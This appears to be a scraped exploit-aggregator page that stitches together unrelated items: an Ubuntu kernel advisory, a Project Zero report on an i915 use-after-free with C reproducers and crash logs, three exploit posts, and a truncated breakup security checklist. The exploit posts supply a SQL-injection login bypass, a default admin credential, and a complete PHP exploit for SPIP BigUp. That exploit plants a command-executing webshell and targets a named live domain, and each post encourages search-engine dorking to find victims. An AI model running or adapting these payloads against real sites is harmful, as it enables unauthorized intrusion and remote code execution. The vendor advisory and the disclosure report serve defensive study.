Ubuntu Security Notice 7028-1 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    =========================================================================Ubuntu Security Notice USN-7028-1September 23, 2024linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash).Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Greybus drivers;  - Modular ISDN driver;  - Multiple devices driver;  - Network drivers;  - SCSI drivers;  - VFIO drivers;  - F2FS file system;  - GFS2 file system;  - JFS file system;  - NILFS2 file system;  - Kernel debugger infrastructure;  - Bluetooth subsystem;  - IPv4 networking;  - L2TP protocol;  - Netfilter;  - RxRPC session sockets;(CVE-2024-42154, CVE-2023-52527, CVE-2024-26733, CVE-2024-42160,CVE-2021-47188, CVE-2024-38570, CVE-2024-26851, CVE-2024-26984,CVE-2024-26677, CVE-2024-39480, CVE-2024-27398, CVE-2022-48791,CVE-2024-42224, CVE-2024-38583, CVE-2024-40902, CVE-2023-52809,CVE-2024-39495, CVE-2024-26651, CVE-2024-26880, CVE-2024-42228,CVE-2024-27437, CVE-2022-48863)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-4.15.0-1135-oracle  4.15.0-1135.146          Available with Ubuntu Pro  linux-image-4.15.0-1156-kvm     4.15.0-1156.161          Available with Ubuntu Pro  linux-image-4.15.0-1166-gcp     4.15.0-1166.183          Available with Ubuntu Pro  linux-image-4.15.0-1173-aws     4.15.0-1173.186          Available with Ubuntu Pro  linux-image-4.15.0-1181-azure   4.15.0-1181.196          Available with Ubuntu Pro  linux-image-4.15.0-229-generic  4.15.0-229.241          Available with Ubuntu Pro  linux-image-4.15.0-229-lowlatency  4.15.0-229.241          Available with Ubuntu Pro  linux-image-aws-lts-18.04       4.15.0.1173.171          Available with Ubuntu Pro  linux-image-azure-lts-18.04     4.15.0.1181.149          Available with Ubuntu Pro  linux-image-gcp-lts-18.04       4.15.0.1166.179          Available with Ubuntu Pro  linux-image-generic             4.15.0.229.213          Available with Ubuntu Pro  linux-image-kvm                 4.15.0.1156.147          Available with Ubuntu Pro  linux-image-lowlatency          4.15.0.229.213          Available with Ubuntu Pro  linux-image-oracle-lts-18.04    4.15.0.1135.140          Available with Ubuntu Pro  linux-image-virtual             4.15.0.229.213          Available with Ubuntu ProUbuntu 16.04 LTS  linux-image-4.15.0-1135-oracle  4.15.0-1135.146~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1166-gcp     4.15.0-1166.183~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1173-aws     4.15.0-1173.186~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-1181-azure   4.15.0-1181.196~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-229-generic  4.15.0-229.241~16.04.1          Available with Ubuntu Pro  linux-image-4.15.0-229-lowlatency  4.15.0-229.241~16.04.1          Available with Ubuntu Pro  linux-image-aws-hwe             4.15.0.1173.186~16.04.1          Available with Ubuntu Pro  linux-image-azure               4.15.0.1181.196~16.04.1          Available with Ubuntu Pro  linux-image-gcp                 4.15.0.1166.183~16.04.1          Available with Ubuntu Pro  linux-image-generic-hwe-16.04   4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-gke                 4.15.0.1166.183~16.04.1          Available with Ubuntu Pro  linux-image-lowlatency-hwe-16.04  4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-oem                 4.15.0.229.241~16.04.1          Available with Ubuntu Pro  linux-image-oracle              4.15.0.1135.146~16.04.1          Available with Ubuntu Pro  linux-image-virtual-hwe-16.04   4.15.0.229.241~16.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7028-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2023-52527,  CVE-2023-52809, CVE-2024-26651, CVE-2024-26677, CVE-2024-26733,  CVE-2024-26851, CVE-2024-26880, CVE-2024-26984, CVE-2024-27398,  CVE-2024-27437, CVE-2024-38570, CVE-2024-38583, CVE-2024-39480,  CVE-2024-39495, CVE-2024-40902, CVE-2024-42154, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228

Ubuntu Security Notice USN-7028-1

Linux i915 suffers from an out-of-bounds PTE write in vm_fault_gtt() that leads to a PTE use-after-free vulnerability.

    I found a bug in the i915 code that allows a process with access to a rendernode (/dev/dri/renderD128) to corrupt kernel memory.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-08-28.Summaryvm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limitthe size to area->vm_end - {address passed to remap_io_mapping} instead ofarea->vm_end - area->vm_start.Bug description[For people reading this bug report who are not i915 experts: I highly recommendfirst reading sima's "i915/GEM Crashcourse" athttps://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn'thave understood what's going on in this code without reading that.]I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.PTEs pointing into the GTT MMIO window are written as follows:/\* Now pin it into the GTT as needed \*/  vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,                                    PIN_MAPPABLE |                                    PIN_NONBLOCK /\* NOWARN \*/ |                                    PIN_NOEVICT);  if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {          /\* Use a partial view if it is bigger than available space \*/          struct i915_gtt_view view =                  compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);  [...]          vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);  [...]  }  [...]  /\* Finally, remap it using the new GTT offset \*/  ret = remap_io_mapping(area,                         area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),                         (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,                         min_t(u64, vma->size, area->vm_end - area->vm_start),                         &ggtt->iomap);  In the case where the first i915_gem_object_ggtt_pin_ww() call refuses tomap the whole object into the GTT MMIO window, for example because theobject is too big to fit into the window, a subrange of the object is mappedinstead. When this happens and the subrange is not at the start of the VMA,vma->gtt_view.partial.offset is nonzero.In this case, the size parameter passed to remap_io_mapping() is calculatedwrong: It is limited to the size of the VMA (area->vm_end - area->vm_start),but with an address that is higher than where the VMA starts(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so theend address is only limited toarea->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).When the VMA covers the whole object, this has no bad consequences because ofthe min_t(); but if the VMA is shorter than the object, PTEs can be writtenout of bounds.This can be tested with the following reproducer - on my system it causes"BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducertries to exit:// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    void poke(volatile char \*p) {    printf("poking      %p\n", p);    \*p = 1;  }    int main(void) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    #define MAP_SIZE (128 MiB - 0x80000)    volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));    printf("mapped from %p\n", map);    poke(map + MAP_SIZE - 0x1000);    poke(map);    printf("mapped to   %p\n", map + MAP_SIZE);  }  Code historyThe current form of the buggy code is from commit c58305af1835 ("drm/i915: Useremap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), butI think back then it was unreachable because the code for constructing a partialview limited the partial view's size based on the VMA bounds back then:                view.params.partial.size =                          min_t(unsigned int, chunk_size,                                (area->vm_end - area->vm_start) / PAGE_SIZE -                                view.params.partial.offset);  This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partialview against the object not vma", first in v4.11). I suspect the bug becamehittable after that point.Most places in the kernel that install PFNMAP PTEs use helpers likeremap_pfn_range() that make sure the passed range fits into the specified VMA;but it looks like i915 doesn't use those because it wants to be able to clobberexisting PTEs, which the usual helpers treat as an error.(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)i915 instead uses its own helper remap_io_mapping(), which just writes PTEsin the specified virtual address range.ExploitabilityOne consequence of this bug is that, because PFNMAP PTEs are written outside theregion covered by the VMA, the MM subsystem can't shoot them down when thedriver wants to revoke userspace's access to the region. So this could probablybe used to gain access to memory that is later mapped into the GTT in the MMIOwindow - but I don't know enough about i915 to tell whether that is bad orwhether shaders always have access to all GTT memory anyway.Probably another consequence would be that if you had a VMA at the end of theuserspace virtual address space, you could get memory mapped into the kernelhalf of memory? But that probably wouldn't lead to anything overly bad...The one way I know of to turn this bug into something that is definitely badis to turn it into page table UAF, like inhttps://crbug.com/project-zero/2350:When you're only holding the mmap_lock in read mode (like in a page faulthandler), page tables that are not needed by any VMA can be freed concurrently.So if we have one GTT-backed VMA directly ahead of a second VMA, and thenconcurrently trigger a fault in the GTT-backed VMA while unmapping the secondVMA, the out-of-bounds page table access off of the first VMA can walk pagetables that are concurrently freed.I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAFaccess) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCUgrace periods much shorter at the expense of performance, which makes it easierto detect use-after-free bugs for objects that are RCU-freed), using thefollowing reproducer, running on a system with Xe Graphics (TGL GT2):// written for a device with Xe Graphics (TGL GT2)    #define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <fcntl.h>  #include <stdio.h>  #include <inttypes.h>  #include <sys/ioctl.h>  #include <sys/mman.h>  #include <drm/i915_drm.h>    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    #define MiB \*(1024\*1024)    // virtual address at the boundary between PGD entries  #define PGD_BOUNDARY_ADDR 0x8000000000    #define MAP_SIZE (128 MiB - 0x80000)  #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)    #define FLIPPER_MAP_SIZE 0x200000    static void \*flipper_thread_fn(void \*dummy) {    int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = FLIPPER_MAP_SIZE    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("flipper created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);    while (1) {      SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));    }    return NULL;  }    int main(void) {    pthread_t flipper_thread;    if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))      errx(1, "pthread_create");      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));      struct drm_i915_gem_create gem_create = {      .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));    printf("created GEM 0x%x\n", gem_create.handle);      struct drm_i915_gem_mmap_offset mmap_offset_arg = {      .handle = gem_create.handle,      .flags = I915_MMAP_OFFSET_GTT    };    SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));    printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);      while (1) {      SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));      \*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000);      SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE));    }  }  With that, I quickly got a KASAN splat (guess unwind lines removed):[  906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF  [  906.819808] ==================================================================  [  906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809    [  906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3  [  906.819835] Hardware name: [...]  [  906.819838] Call Trace:  [  906.819839]  <TASK>  [  906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))  [  906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  [  906.819859] kasan_report (mm/kasan/report.c:603)  [  906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)  [  906.819869] __pte_alloc (mm/memory.c:445)  [  906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)  [  906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)  [  906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)  [  906.819924] __do_fault (mm/memory.c:4531)  [  906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)  [  906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)  [  906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)  [  906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)  [  906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)  [  906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)  [  906.819967] RIP: 0033:0x561a370af516  [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8  All code  ========     0:   48 83 7d e8 ff          cmpq   $0xffffffffffffffff,-0x18(%rbp)     5:   75 19                   jne    0x20     7:   48 8d 05 26 0d 00 00    lea    0xd26(%rip),%rax        # 0xd34     e:   48 89 c6                mov    %rax,%rsi    11:   bf 01 00 00 00          mov    $0x1,%edi    16:   b8 00 00 00 00          mov    $0x0,%eax    1b:   e8 64 fb ff ff          call   0xfffffffffffffb84    20:   48 b8 00 f0 ff ff 7f    movabs $0x7ffffff000,%rax    27:   00 00 00    2a:\*  0f b6 00                movzbl (%rax),%eax              <-- trapping instruction    2d:   be 00 00 f8 07          mov    $0x7f80000,%esi    32:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax    39:   00 00 00    3c:   48 89 c7                mov    %rax,%rdi    3f:   e8                      .byte 0xe8    Code starting with the faulting instruction  ===========================================     0:   0f b6 00                movzbl (%rax),%eax     3:   be 00 00 f8 07          mov    $0x7f80000,%esi     8:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax     f:   00 00 00    12:   48 89 c7                mov    %rax,%rdi    15:   e8                      .byte 0xe8  [  906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213  [  906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3  [  906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000  [  906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000  [  906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000  [  906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020  [  906.819987]  </TASK>    [  906.819990] The buggy address belongs to the physical page:  [  906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919  [  906.819994] flags: 0x4000000000000000(zone=1)  [  906.819997] page_type: 0xffffffff()  [  906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000  [  906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000  [  906.820004] page dumped because: kasan: bad access detected    [  906.820006] Memory state around the buggy address:  [  906.820008]  ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820010]  ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [  906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820013]                    ^  [  906.820014]  ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820016]  ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  [  906.820017] ==================================================================  This bug is probably not very interesting on Linux servers, since access tothe render node is typically only granted to UIDs who have locally signed into a machine; but it is probably relevant for things like ChromeOS, and maybealso for escaping from some types of sandboxed desktop applications?Related CVE Number: CVE-2024-42259.Found by: jannh@google.com

Linux i915 PTE Use-After-Free

Registration and Login System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Registration and Login System v1.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/User-Registration-and-login-System-with-admin-panel.zip                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/loginsystem/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Registration And Login System 1.0 SQL Injection

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.3.1 Code Injection

RecipePoint version 1.9 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : RecipePoint 1.9 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/recipepoint/                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/recipepoint/adminGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

RecipePoint 1.9 Insecure Settings

The internet has made breaking up a lot harder. The Modern Love Digital Breakup Checklist can help you separate locations, accounts, and more.

Breaking up is hard to do. The internet has made it harder.

With couples today regularly sharing access to one another’s email accounts, streaming services, social media platforms, online photo albums, and more, the risk of a bad breakup isn’t just heartache. Equipped with unfettered access into sensitive, shared online accounts, a vindictive ex could track someone who is actively using services like DoorDash, Uber, or Airbnb, spy on someone through a Ring doorbell, raise the temperature on a Nest thermostat, or shout obscenities through a baby monitor.

As every relationship is different, there’s no one-size-fits-all solution to safely disentangling your digital life from your ex, but there are a few rules that can make the process easier.

And, because this can be a lot of work, here are a few things that can help you along the way:

*   A password manager that will help you create and store unique passwords for each online account.
*   The use of multifactor/two-factor authentication on every sensitive account that allows it.
*   A friend who can go through these exercises side-by-side with you.

Further down is a more comprehensive checklist of many considerations you can take in separating your digital life from your ex, but, here’s a quick, handy guide:

It’s important to remember that this work won’t be completed in a day. That’s entirely okay. Instead of trying to accomplish everything in one weekend, prioritize the most sensitive work—cutting off access to email accounts, online banking, shared photo albums, social media, and any services or apps that can reveal your location.

As Malwarebytes recently discovered in research conducted this year, 56% of people in committed relationships in the United States agreed that they “would like to see more guidance on how to handle shared logins, accounts, and apps in a relationship or during a breakup,” and 45% agreed that they “would have a hard time knowing where to begin if I no longer wanted to share location-based apps or services with my partner or in the event of a breakup.”

We hope this digital breakup checklist, which is not comprehensive, can provide some of that guidance.

Here is the Modern Love Digital Breakup Checklist.

*   Log out of personal accounts on shared devices, including laptops, tablets, e-readers, smartphones, smart TVs, and Internet of Things devices. This includes:
    
    *   Email, social media, and online banking accounts on shared tablets, computers, and smartphones.
    
    *   Email, social media, and online banking accounts on the shared devices of children/the entire family.
    *   Entertainment accounts (Hulu, Netflix, Disney+, Spotify, etc.) on smart TVs and streaming devices such as Roku, Google Chromecast, Apple TV, etc.
*   Remove your ex’s accounts from any device you share that you will maintain ownership of after the breakup. Here’s are guides on how to remove someone from:
    
    *   Windows device
    
    *   Mac device
    *   Android devices

*   For shared accounts where you and your ex had one set of login credentials, log out of those shared accounts on your own device.
*   If you want to continue using those services, create a new personal account with a unique password.

**3\. **Review personal accounts****

*   Before resetting passwords, check the recovery settings on your personal account to ensure that any attempts to reset your password will be sent to your personal email account and not to an email account owned by your ex.
*   Before resetting passwords, consider using a password manager to help create, store, and remember unique passwords for each account.
*   Reset and create unique passwords for sensitive accounts, including:
    
    *   Email accounts
    
    *   Online banking and financial accounts (Chase, Wells Fargo, Venmo, PayPal, Zelle, Cash App, etc.)
    *   Online shopping accounts (Amazon, Etsy, Shein, Temu, etc.)
    *   Social media accounts (TikTok, Instagram, Facebook, etc.)
    *   Shared cloud accounts for photos (Google Photos, iCloud)
    *   Shared cloud accounts for file storage (Dropbox, Box, etc.)
    *   Streaming entertainment accounts (Netflix, Disney+, Hulu, Spotify, Apple Music, etc.)
    *   Parental monitoring apps (Life360, Bark, Qustodio)
    *   Online forums and chat services (Reddit, Discord, etc.)
*   Reset and create unique passwords for accounts that can expose your location to users who are logged into the same account, including:
    
    *   Food and grocery delivery apps (Uber Eats, DoorDash, Postmates, etc.)
    
    *   Ride-sharing apps (Uber, Lyft, etc.)Vacation rental apps (Airbnb, Vrbo, etc.)
    *   Health and fitness tracking apps (FitBit, Strava, etc.)
    *   Connected apps for modern cars with anti-theft location tracking
*   Enable multifactor authentication on sensitive accounts and accounts that can expose your location, when provided as an option.

**4\. **Review/remove your signed-in devices****

